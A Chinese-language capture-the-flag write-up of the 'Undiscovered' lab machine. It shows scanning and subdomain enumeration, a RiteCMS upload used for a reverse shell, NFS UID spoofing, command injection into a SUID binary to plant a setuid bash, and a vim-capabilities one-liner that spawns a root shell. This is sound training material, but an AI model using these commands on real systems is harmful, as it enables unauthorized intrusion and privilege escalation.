Undiscovered
端口扫描
root@ip-10-10-80-215:~/undiscoveredup# nmap -sTCV -p- --min-rate 1000 10.10.186.129
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-05 03:53 BST
Nmap scan report for undiscovered.thm (10.10.186.129)
Host is up (0.00040s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:76:81:49:50:bb:6f:4f:06:15:cc:08:88:01:b8:f0 (RSA)
| 256 2b:39:d9:d9:b9:72:27:a9:32:25:dd:de:e4:01:ed:8b (ECDSA)
|_ 256 2a:38:ce:ea:61:82:eb:de:c4:e0:2b:55:7f:cc:13:bc (EdDSA)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100021 1,3,4 34776/tcp nlockmgr
| 100021 1,3,4 53375/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
2049/tcp open nfs 2-4 (RPC #100003)
34776/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 02:92:CE:A9:71:6F (Unknown)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.70 seconds
2049
因为开放了 NFS 服务, 所以我们有必要进行枚举一下, 但是没有任何数据显示
80
题目告诉我们存在一个域, 所以有必要进行子域的扫描
root@ip-10-10-80-215:~/undiscoveredup# ffuf -u http://FUZZ.undiscovered.thm/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1
________________________________________________
:: Method : GET
:: URL : http://FUZZ.undiscovered.thm/
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
manager [Status: 200, Size: 4584, Words: 385, Lines: 69]
dashboard [Status: 200, Size: 4626, Words: 385, Lines: 69]
deliver [Status: 200, Size: 4650, Words: 385, Lines: 83]
newsite [Status: 200, Size: 4584, Words: 385, Lines: 69]
develop [Status: 200, Size: 4584, Words: 385, Lines: 69]
network [Status: 200, Size: 4584, Words: 385, Lines: 69]
maintenance [Status: 200, Size: 4668, Words: 385, Lines: 69]
forms [Status: 200, Size: 4542, Words: 385, Lines: 69]
view [Status: 200, Size: 4521, Words: 385, Lines: 69]
start [Status: 200, Size: 4542, Words: 385, Lines: 69]
play [Status: 200, Size: 4521, Words: 385, Lines: 69]
mailgate [Status: 200, Size: 4605, Words: 385, Lines: 69]
booking [Status: 200, Size: 4599, Words: 385, Lines: 84]
terminal [Status: 200, Size: 4605, Words: 385, Lines: 69]
gold [Status: 200, Size: 4521, Words: 385, Lines: 69]
internet [Status: 200, Size: 4605, Words: 385, Lines: 69]
resources [Status: 200, Size: 4626, Words: 385, Lines: 69]
在访问新发现的子域时, 我发现其中明示我们一个 CMS 以及其版本, 并且我发现了其对应的漏洞 RiteCMS 2.2.1 - Authenticated Remote Code Execution
但是在我们进行尝试访问的时候会发现很多子域都是假的, 所以我们经过枚举进行查看, 最终锁定子域 deliver.undiscovered.thm 再次进行扫描
root@ip-10-10-80-215:~/undiscoveredup# gobuster dir -u http://deliver.undiscovered.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://deliver.undiscovered.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/10/05 04:17:32 Starting gobuster
===============================================================
/index.php (Status: 200)
/templates (Status: 301)
/media (Status: 301)
/files (Status: 301)
/data (Status: 301)
/cms (Status: 301)
/README.txt (Status: 200)
/js (Status: 301)
/INSTALL.txt (Status: 200)
/LICENSE (Status: 200)
/server-status (Status: 403)
===============================================================
2023/10/05 04:19:00 Finished
===============================================================
-
首先从之前的漏洞中我们知道我们首先需要进行登陆, 所以我们还需要掌握账号, 但是不能进行用户名枚举
-
在进行访问 data 时我发现其中提供了一个 sql 其中我们可以获取到用户的名称
得到的密码无法解密, 所以进行暴力破解, 获取到密码之后, 我们按照对应的漏洞直接上传反向 Shell 进行连接即可
后渗透
www-data
访问我们上传的 reverse shell , 从而获取到连接
www-data —> leonard
我们知道之前存在 NFS 服务共享, 所以我们查看一下 NFS 的配置文件, 了解到存在一个 /home/william 共享
(remote) www-data@undiscovered:/var/www/deliver.undiscovered.thm/data$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/william *(rw,root_squash)
我们将其挂载到本地, 但是你会发现对于 william 我们是没有权限访问的
root@ip-10-10-80-215:~/undiscoveredup# mount -t nfs 10.10.186.129:/home/william ./william
root@ip-10-10-80-215:~/undiscoveredup# ls -al william
drwxr-x--- 4 nobody 4294967294 4096 Sep 9 2020 william
为了解决上面的问题, 我们需要创建一个和 william 的 UID 一样的本地用户, 通过查看发现 william 的 uid=3003
root@ip-10-10-80-215:~/undiscoveredup# sudo useradd -u 3003 tom
root@ip-10-10-80-215:~/undiscoveredup# su tom
$ cd william
$ ls -al
total 44
drwxr-x--- 4 nobody 4294967294 4096 Sep 9 2020 .
drwxr-xr-x 4 root root 4096 Oct 5 04:54 ..
-rwxr-xr-x 1 nobody 4294967294 128 Sep 4 2020 admin.sh
-rw------- 1 nobody 4294967294 0 Sep 9 2020 .bash_history
-rw-r--r-- 1 nobody 4294967294 3771 Sep 4 2020 .bashrc
drwx------ 2 nobody 4294967294 4096 Sep 4 2020 .cache
drwxrwxr-x 2 nobody 4294967294 4096 Sep 4 2020 .nano
-rw-r--r-- 1 nobody 4294967294 43 Sep 4 2020 .profile
-rwsrwsr-x 1 nobody 4294967294 8776 Sep 4 2020 script
-rw-r----- 1 nobody 4294967294 38 Sep 9 2020 user.txt
通过查看我发现 对于 script 会调用 admin.sh 程序, 但是没有什么用, 但是我们可以改变 william 的权限, 使其变得所有人都��可以访问, 在本地执行下面命令, 完成之后你就会发现对于 /home/william 你也会有权限访问
$ chmod 777 ./william
其中对于 script 程序我们可以看出其对于 leonard 存在 SUID 权限, 接着我将其复制到本地进行逆向分析
我们可以在其中发现一个 main 程序,. 对其进行分析我们可以作出如下分析:
- 如果我们没有传参就会执行 admin.sh 程序
- 如果进行传参, 就会转换为 1002 用户进行执行
进行了一些尝试后我发现可以利用其进行命令注入的操作
所以围绕这个进行操作
(remote) www-data@undiscovered:/home/william$ ./script "; cp /bin/bash /tmp/bash" 123
/bin/cat: /home/leonard/: Is a directory
(remote) www-data@undiscovered:/home/william$ ls -al /tmp/bash
-rwxr-xr-x 1 leonard www-data 1037528 Oct 5 12:18 /tmp/bash
(remote) www-data@undiscovered:/home/william$ ./script "; chmod u+s /tmp/bash" 123
/bin/cat: /home/leonard/: Is a directory
(remote) www-data@undiscovered:/home/william$ ls -al /tmp/bash
-rwsr-xr-x 1 leonard www-data 1037528 Oct 5 12:18 /tmp/bash
(remote) www-data@undiscovered:/home/william$ /tmp/bash -p
(remote) leonard@undiscovered:/home/william$ id
uid=33(www-data) gid=33(www-data) euid=1002(leonard) groups=33(www-data)
之后我们可以在 leonard 家目录发现一个 ssh 私钥
leonard —> root
在此我切换成了 SSH 私钥连接, 此时枚举 capabilities 程序我发现一个特殊的程序 vim#capabilities
但是你利用 py 会报错, 所以替换成 py3 就可以实现操作了
leonard@undiscovered:~$ /usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
